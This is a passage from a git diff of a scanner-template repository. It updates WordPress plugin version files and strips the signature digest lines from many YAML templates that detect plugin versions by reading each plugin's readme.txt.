-- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 2 -- http/technologies/wordpress/plugins/custom-css-js.yaml | 2 -- http/technologies/wordpress/plugins/custom-fonts.yaml | 2 -- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 2 -- http/technologies/wordpress/plugins/disable-comments.yaml | 2 -- http/technologies/wordpress/plugins/disable-gutenberg.yaml | 2 -- http/technologies/wordpress/plugins/duplicate-page.yaml | 2 -- http/technologies/wordpress/plugins/duplicate-post.yaml | 2 -- http/technologies/wordpress/plugins/duplicator.yaml | 2 -- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 2 -- .../wordpress/plugins/easy-table-of-contents.yaml | 2 -- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 2 -- http/technologies/wordpress/plugins/elementor.yaml | 2 -- http/technologies/wordpress/plugins/elementskit-lite.yaml | 2 -- http/technologies/wordpress/plugins/enable-media-replace.yaml | 2 -- http/technologies/wordpress/plugins/envato-elements.yaml | 2 -- .../plugins/essential-addons-for-elementor-lite.yaml | 2 -- http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 2 -- .../wordpress/plugins/facebook-for-woocommerce.yaml | 2 -- http/technologies/wordpress/plugins/fast-indexing-api.yaml | 2 -- .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 2 -- http/technologies/wordpress/plugins/flamingo.yaml | 2 -- http/technologies/wordpress/plugins/fluentform.yaml | 2 -- http/technologies/wordpress/plugins/font-awesome.yaml | 2 -- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 2 -- http/technologies/wordpress/plugins/formidable.yaml | 2 -- http/technologies/wordpress/plugins/forminator.yaml | 2 -- http/technologies/wordpress/plugins/ga-google-analytics.yaml | 2 -- .../wordpress/plugins/gdpr-cookie-compliance.yaml | 2 -- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 2 -- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 2 -- .../wordpress/plugins/google-listings-and-ads.yaml | 2 -- http/technologies/wordpress/plugins/google-site-kit.yaml | 2 -- .../wordpress/plugins/google-sitemap-generator.yaml | 2 -- http/technologies/wordpress/plugins/gtranslate.yaml | 2 -- http/technologies/wordpress/plugins/gutenberg.yaml | 2 -- .../wordpress/plugins/happy-elementor-addons.yaml | 2 -- .../wordpress/plugins/header-footer-code-manager.yaml | 2 -- .../wordpress/plugins/header-footer-elementor.yaml | 2 -- http/technologies/wordpress/plugins/header-footer.yaml | 2 -- http/technologies/wordpress/plugins/health-check.yaml | 2 -- http/technologies/wordpress/plugins/hello-dolly.yaml | 2 -- http/technologies/wordpress/plugins/host-webfonts-local.yaml | 2 -- http/technologies/wordpress/plugins/hostinger.yaml | 2 -- http/technologies/wordpress/plugins/image-optimization.yaml | 2 -- http/technologies/wordpress/plugins/imagify.yaml | 2 -- http/technologies/wordpress/plugins/imsanity.yaml | 2 -- .../wordpress/plugins/insert-headers-and-footers.yaml | 2 -- http/technologies/wordpress/plugins/instagram-feed.yaml | 2 -- .../wordpress/plugins/intuitive-custom-post-order.yaml | 2 -- http/technologies/wordpress/plugins/iwp-client.yaml | 2 -- http/technologies/wordpress/plugins/jetpack-boost.yaml | 2 -- http/technologies/wordpress/plugins/jetpack.yaml | 2 -- http/technologies/wordpress/plugins/kadence-blocks.yaml | 2 -- http/technologies/wordpress/plugins/kirki.yaml | 2 -- http/technologies/wordpress/plugins/leadin.yaml | 2 -- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 2 -- http/technologies/wordpress/plugins/limit-login-attempts.yaml | 2 -- http/technologies/wordpress/plugins/litespeed-cache.yaml | 2 -- http/technologies/wordpress/plugins/loco-translate.yaml | 2 -- http/technologies/wordpress/plugins/loginizer.yaml | 2 -- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 2 -- http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 2 -- http/technologies/wordpress/plugins/mailpoet.yaml | 2 -- http/technologies/wordpress/plugins/maintenance.yaml | 2 -- http/technologies/wordpress/plugins/mainwp-child.yaml | 2 -- http/technologies/wordpress/plugins/malcare-security.yaml | 2 -- http/technologies/wordpress/plugins/megamenu.yaml | 2 -- http/technologies/wordpress/plugins/members.yaml | 2 -- http/technologies/wordpress/plugins/meta-box.yaml | 2 -- http/technologies/wordpress/plugins/metform.yaml | 2 -- http/technologies/wordpress/plugins/ml-slider.yaml | 2 -- http/technologies/wordpress/plugins/newsletter.yaml | 2 -- .../wordpress/plugins/nextend-facebook-connect.yaml | 2 -- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 2 -- http/technologies/wordpress/plugins/ninja-forms.yaml | 2 -- http/technologies/wordpress/plugins/ocean-extra.yaml | 2 -- .../wordpress/plugins/official-facebook-pixel.yaml | 2 -- .../technologies/wordpress/plugins/one-click-demo-import.yaml | 2 -- http/technologies/wordpress/plugins/optinmonster.yaml | 2 -- http/technologies/wordpress/plugins/otter-blocks.yaml | 2 -- http/technologies/wordpress/plugins/password-protected.yaml | 2 -- http/technologies/wordpress/plugins/pdf-embedder.yaml | 2 -- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 2 -- http/technologies/wordpress/plugins/pixelyoursite.yaml | 2 -- http/technologies/wordpress/plugins/polylang.yaml | 2 -- http/technologies/wordpress/plugins/popup-maker.yaml | 2 -- http/technologies/wordpress/plugins/post-smtp.yaml | 4 +--- http/technologies/wordpress/plugins/post-types-order.yaml | 2 -- .../wordpress/plugins/premium-addons-for-elementor.yaml | 2 -- http/technologies/wordpress/plugins/pretty-link.yaml | 2 -- .../technologies/wordpress/plugins/really-simple-captcha.yaml | 2 -- http/technologies/wordpress/plugins/really-simple-ssl.yaml | 2 -- http/technologies/wordpress/plugins/redirection.yaml | 2 -- http/technologies/wordpress/plugins/redux-framework.yaml | 2 -- .../technologies/wordpress/plugins/regenerate-thumbnails.yaml | 2 -- .../wordpress/plugins/royal-elementor-addons.yaml | 2 -- http/technologies/wordpress/plugins/safe-svg.yaml | 2 -- http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 2 -- http/technologies/wordpress/plugins/sg-cachepress.yaml | 2 -- http/technologies/wordpress/plugins/sg-security.yaml | 2 -- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 2 -- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 2 -- .../wordpress/plugins/simple-custom-post-order.yaml | 2 -- http/technologies/wordpress/plugins/simple-history.yaml | 2 -- http/technologies/wordpress/plugins/siteguard.yaml | 2 -- http/technologies/wordpress/plugins/siteorigin-panels.yaml | 2 -- http/technologies/wordpress/plugins/smart-slider-3.yaml | 2 -- http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 2 -- .../plugins/sticky-header-effects-for-elementor.yaml | 2 -- .../plugins/stops-core-theme-and-plugin-updates.yaml | 2 -- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 2 -- http/technologies/wordpress/plugins/svg-support.yaml | 2 -- .../wordpress/plugins/table-of-contents-plus.yaml | 2 -- http/technologies/wordpress/plugins/tablepress.yaml | 2 -- http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 2 -- http/technologies/wordpress/plugins/templately.yaml | 2 -- http/technologies/wordpress/plugins/the-events-calendar.yaml | 2 -- http/technologies/wordpress/plugins/tinymce-advanced.yaml | 2 -- .../wordpress/plugins/translatepress-multilingual.yaml | 2 -- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 2 -- .../wordpress/plugins/under-construction-page.yaml | 2 -- http/technologies/wordpress/plugins/updraftplus.yaml | 2 -- http/technologies/wordpress/plugins/user-role-editor.yaml | 2 -- http/technologies/wordpress/plugins/w3-total-cache.yaml | 2 -- .../wordpress/plugins/webp-converter-for-media.yaml | 2 -- http/technologies/wordpress/plugins/webp-express.yaml | 2 -- .../wordpress/plugins/widget-importer-exporter.yaml | 2 -- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 2 -- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 2 -- .../wordpress/plugins/woo-variation-swatches.yaml | 2 -- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 2 -- .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 2 -- http/technologies/wordpress/plugins/woocommerce-payments.yaml | 2 -- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 2 -- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 2 -- http/technologies/wordpress/plugins/woocommerce-services.yaml | 2 -- http/technologies/wordpress/plugins/woocommerce.yaml | 2 -- http/technologies/wordpress/plugins/wordfence.yaml | 2 -- http/technologies/wordpress/plugins/wordpress-importer.yaml | 2 -- http/technologies/wordpress/plugins/wordpress-seo.yaml | 2 -- http/technologies/wordpress/plugins/worker.yaml | 2 -- http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 2 -- http/technologies/wordpress/plugins/wp-file-manager.yaml | 2 -- http/technologies/wordpress/plugins/wp-google-maps.yaml | 2 -- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 2 -- http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 2 -- http/technologies/wordpress/plugins/wp-migrate-db.yaml | 2 -- http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 2 -- http/technologies/wordpress/plugins/wp-optimize.yaml | 2 -- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 2 -- http/technologies/wordpress/plugins/wp-reset.yaml | 2 -- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 2 -- http/technologies/wordpress/plugins/wp-rollback.yaml | 2 -- http/technologies/wordpress/plugins/wp-seopress.yaml | 2 -- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 2 -- http/technologies/wordpress/plugins/wp-smushit.yaml | 2 -- http/technologies/wordpress/plugins/wp-statistics.yaml | 2 -- http/technologies/wordpress/plugins/wp-super-cache.yaml | 2 -- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 2 -- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 2 -- http/technologies/wordpress/plugins/wpforms-lite.yaml | 2 -- http/technologies/wordpress/plugins/wps-hide-login.yaml | 2 -- .../technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 2 -- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 2 -- 210 files changed, 11 insertions(+), 411 deletions(-) diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt index c48ab2bc53..ffbbb67770 100644 --- a/helpers/wordpress/plugins/coblocks.txt +++ b/helpers/wordpress/plugins/coblocks.txt @@ -1 +1 @@ -3.1.11 \ No newline at end of file +3.1.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index e2bdf6e45a..74500cee16 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.7.3 \ No newline at end of file +2.7.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 807e541706..e9b436e4f0 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -18.6.0 \ No newline at end of file +18.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 9a4f88260f..155a6e113f 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.52.0 \ No newline at end of file +4.53.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index d38c63d7e8..e3bed5e1c4 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.9.4 \ No newline at end of file +2.9.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index 8df288f274..bbd8e9206e 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.6.0 \ No newline at end of file +7.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 4e19b2f721..22f097e28e 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.12.5 \ No newline at end of file +5.13.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 9fdf3baef9..72dfaf1650 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -7.8.0 \ No newline at end of file +7.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt index 500a6932b2..4a01f41a89 100644 --- a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -1 +1 @@ -11.8.6 \ No newline at end of file +11.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wps-hide-login.txt b/helpers/wordpress/plugins/wps-hide-login.txt index 360f7b2b10..49b85c1cc7 100644 --- a/helpers/wordpress/plugins/wps-hide-login.txt +++ b/helpers/wordpress/plugins/wps-hide-login.txt @@ -1 +1 @@ -1.9.16.5 \ No newline at end of file +1.9.16.6 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 65d61e1432..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d52c6308e9dd15aa4681d4014dc5f311313813bc6e03a39760d845e641a485102210085ddd49549589e274f5d2ee4b1472cce518aaa6c9e9395e88646b2000bac1ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index f6c7255248..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073ad9ae3f3b600d69ecb24ee431df67879963efc1fff39853fb05ecf60d9247002205e0e939684614a206a9eb6b6103566f2097cfb006a10f6bfae37afaca6dcbf89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 3b0eb0b009..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d4a8f7c82d949016c4694606d48607b65af17fb47fcc637f1b8b81b4f5cae4e02205ae1ec5505052c1c77d069441a9db2276c8ac2fc4cacb0488a552b054ad127dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index faeb44bafd..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203271ec9687a8e793bf77780b88811e053b787fc5c43d90e2609fdc97953e6e1b022014c579674d60e77df7091cce99c357d8a167e38c03ef6137ee29a67bf2696642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cd52ef76..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008cad2fb98895fa0e68f90230b4f7608a43b996c414e29928de147ff9fced2cdd02206b41fc9e81a8afa425aa2e8885f01fc8d195e6f9059027adfcc7653cf4b72a5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 2cc9e4fe8a..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a33dd9e05dc4d319c939ff8c22e330cb4315f5514530ef4def02de2ba4386195022100c32e1bbdd17a3309fdde3d91e1c3cf7d68696026b10ea52fd9ca79c2cda4fd8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 82e031b36f..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004146523b6d25b5b01c1b5cea9a3a070c7ec3e0039ab6929237c11e91c12c7060220392366b25d7541ef75519e8e45800913c5383b992923d9b438e23803f5b431bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index c9c11f688c..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201ba8ef79c897b1404eed19e6c3b2013c60a8da05203a804836adc3481a248631022037d364993ee2af694f117456fcaaad0327f6b74f664897daa1882e07433188b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 6a98f8f16a..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207657cb8e50356e6da431d3749b9582652bfc5ad5ca535587a8cd929f126bac2f022100a1a9cdb3d6247647d407994007ee272ab38dcb65a54c25682fe0a3f095e3ee48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index d03bdbc43e..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b6fb6132bd351136c7a668443662e53ebc75ab764610a36877e7da010cc89f1022100c40d801f49b42c53191b46cfaac3255772ff19e76d505bb81e4c8eedd5ab2075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 1c30b9f02f..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a85fa2a7ce6c0853f7f36527568be5f0e336aa227174e02ef8accd39bf46d84a022100b89374c7bc325172aa76a6db5dc42b34311d64d19c495e49b78f76cbcbce43f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 3606e3dd6d..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204dfbc41d6dd86929d2a6363d7d2b95b010fdeb7c890ed3b44e80e69ca6b3b10402207415c502c8148e10ac92d254c2af200f7f5f0e4cefea9463327fc8a864b4b5e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 3c87a5b93c..d462977581 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205c4c9b0c974ea1b52edff7ae1adbd80ac1f9877647e57c60a06c62e914e8e25702203a1e343fd53e9946a57d250383a0d102fd30d9960153bc7b385ff0b6be763c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index d0e4dc0c63..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b669f309e687aec3e31ad7018572802ce45a77e23661bc1db614b41f0d9eee902200f21f7d302bd954087fe247ce0050ddb159d1afce744aa4375f4e7cf0b7ec594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index a8e36ff545..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200bcaffd2ba18d13ecfe0294556138455ccff053616017717f84fd218447af878022055bf9abf7d5f2fc3cd902c461291a4d0735cae1880a638d59dbc094a5355f73d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 67e612036b..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ebdc031f27e864c22c5971549204d03abc4175922047a6cebc8ea3a0d2d5a1bc02201dee591f4e3340aa846cf161c3179b6ba011c66290c63b5c8c58444c2d3b4481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index b4831038a9..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003200d1425abf3dc81fe7a1d8596b8bb5b70222aa001bd0043896425a1fbc15202202655661d8946291b42260603b12ce357c22a15718375d95277ca05efb30a9eb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 59566592d2..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/breeze/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220347b19480b30e8714d0eac74dce84cd65e3da993a4574f1bfcb7605fb651cd9502205af71795e14368c4737f26a38d30f11db1fbecde0048ce664a5600479474565c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 65dcdd1dcb..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e33c639124cc0675c85d9420024f8f1a696a7220378bcdebdf7e7a8254313403022066808a5ac5b3e1ddc9aaaab8199899fb7935100a73b5acae41920428ab39bde7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 3c8ab6d382..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b84ee062a79650a89a22dc814fbcc73eff6a15d49cc320d61e31f29a1adcb3a022100cfe29e8552cc483fef94977902527c00a2a98f7dc1a28835763acb619bffbd70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index f423a72bd8..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9aada81ea3956bbe7c023b4d558dbe9e9b030ab49bf4aabc2a842a6942ed0bc02205c9d3e777d0124871106473a39c9b4b47ec02f4ef6c0c5725195f88ae036caed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index dd865c01e9..57e618924b 100644 --- 